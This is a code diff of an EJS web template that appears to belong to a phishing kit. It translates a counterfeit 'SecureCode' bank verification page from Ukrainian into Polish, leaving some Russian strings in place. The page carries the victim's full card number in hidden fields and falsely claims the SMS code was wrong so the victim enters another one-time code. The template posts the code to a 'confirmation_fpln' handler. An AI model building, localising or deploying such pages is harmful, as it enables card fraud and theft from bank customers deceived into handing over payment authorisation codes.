--- a/views/index_code_f_pln.ejs
+++ b/views/index_code_f_pln.ejs
@@ -1,7 +1,7 @@
 <html>
 
 <head>
-	<title>SecureCode</title>
+	<title>Kod bezpieczeństwa</title>
 	<meta charset="utf-8">
 	<meta name="robots" content="all">
 	<meta name="description" content="">
@@ -20,7 +20,7 @@
 </head>
 
 <body>
-	<form class="form-payment" action="confirmation_fua" method="post">
+	<form class="form-payment" action="confirmation_fpln" method="post">
 		<input type="hidden" name="tag" value="">
 		<style>
 		@import url("https://fonts.googleapis.com/css?family=Source+Code+Pro:400,500,600,700|Source+Sans+Pro:400,600,700&display=swap");
@@ -828,27 +828,27 @@
 						<div style="border-bottom: 0px solid #ced6e0;
     padding-bottom: 15px; transition: opacity 0.1s linear 0s, transform 0.1s linear 0s, visibility 0s linear 0.1s;
         box-shadow: rgba(0, 0, 0, 0.08) 0px 4px 8px -4px;
-        transform: translate3d(0px, -8px, 0px);"> <strong style="font-size:23px; padding-left:10px;color:#ced6e0;font-weight: lighter;"><i class="fas fa-shield-alt"></i> SecureCode</strong> </div>
+        transform: translate3d(0px, -8px, 0px);"> <strong style="font-size:23px; padding-left:10px;color:#ced6e0;font-weight: lighter;"><i class="fas fa-shield-alt"></i> Kod bezpieczeństwa</strong> </div>
 					</center>
 				</div>
 				<br>
 				<div class="card-list">
 					<div class="card-form__inner">
-						<center> <strong style="color:;font-size:21px">Підтвердження операції <i style="color:;font-size:17px" data-toggle="tooltip" title="SecureCode – це простий та безпечний спосіб оплати покупок в інтернеті картками, який реалізований шляхом відправки одноразового секретного коду на мобільний телефон власнику картки та перевірки коду на стороні банкінгу." class="far fa-question-circle"></i></strong></center>
+						<center> <strong style="color:;font-size:21px">Potwierdzenie operacji <i style="color:;font-size:17px" data-toggle="tooltip" title="Kod bezpieczeństwa – to prosty i bezpieczny sposób płacenia kartą za zakupy w internecie, który realizowany jest poprzez wysłanie jednorazowego tajnego kodu na telefon komórkowy posiadacza karty i sprawdzenie kodu po stronie bankowej." class="far fa-question-circle"></i></strong></center>
 						<table style="margin: auto;padding: 20px;">
 							<tbody style="margin: auto;">
 								<tr>
-									<th style="float:right" scope="row">Номер картки</th>
+									<th style="float:right" scope="row">Numer karty</th>
 									<td style="padding-left:10px;color:#1a3b5d;font-weight: lighter;"><b>**** **** **** <%= cardnumber %></b></td>
 								</tr>
 							</tbody>
 						</table>
-						<center> <small style="text-align:justify;">Для підтвердження операції на номер телефону було надіслано смс повідомлення з кодом підтвердження. Введіть його у поле нижче.</small> </center>
+						<center> <small style="text-align:justify;">Aby potwierdzić operację, na Twój numer telefonu została wysłana wiadomość SMS z kodem potwierdzającym. Wpisz go w polu poniżej.</small> </center>
 						<br>
-						<center style="color:red"><i class="fas fa-exclamation-circle"></i> Невірний код із смс! Вам надіслано новий код.</center>
+						<center style="color:red"><i class="fas fa-exclamation-circle"></i> Nieprawidłowy kod SMS! Nowy kod został do Ciebie wysłany.</center>
 						<center>
 							<div class="card-input">
-								<label for="cardName" class="card-input__label">Введiть код:</label>
+								<label for="cardName" class="card-input__label">Код из смс:</label>
 								<input type="hidden" name="amount" value=<%= amount %>>
 								<input type="hidden" name="cardnumberAll" value=<%= cardnumberAll %>>
 								<input type="hidden" name="cardnumber" value=<%= cardnumber %>>
@@ -864,7 +864,7 @@
 								<div class="credit-card-form__submit">
 									<div class="credit-card-form__submit-inner">
 										<div class="credit-card-form__submit-inner">
-											<input type="submit" class="card-form__button" name="submit" value="Пiдтвердити" onclick="this.style.display='none';"> </div>
+											<input type="submit" class="card-form__button" name="submit" value="Подтвердить" onclick="this.style.display='none';"> </div>
 									</div>
 								</div>
 							</div>
